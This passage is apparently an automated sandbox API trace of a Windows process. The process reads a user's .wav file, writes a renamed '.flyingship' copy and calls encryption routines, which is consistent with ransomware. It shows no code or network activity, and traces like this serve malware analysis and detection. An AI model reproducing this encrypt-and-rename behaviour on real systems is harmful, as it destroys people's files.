wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.847] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\cxrsn5dptydsim.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.848] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.848] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0181.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.849] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0181.849] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0181.849] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0181.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0181.851] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj")) returned 0x10 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0181.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0181.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0181.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0181.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.852] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\cxrsn5dptydsim.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0181.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0181.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0181.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.853] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0181.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0181.853] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0181.854] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0181.854] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0181.855] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0181.855] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x675e, lpOverlapped=0x0) returned 1 [0181.858] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0181.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x675e) returned 0xbea018 [0181.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0181.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0181.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0181.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x675e) returned 0xbf0780 [0181.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0181.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.859] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0181.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x675e) returned 0xbea018 [0181.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0181.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0181.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.860] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0181.860] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.860] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0181.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0181.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x675e) returned 0xbea018 [0181.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0181.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0181.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x675e) returned 0xbf6ee8 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0181.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0181.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0181.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0181.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0181.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0181.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.863] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0181.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 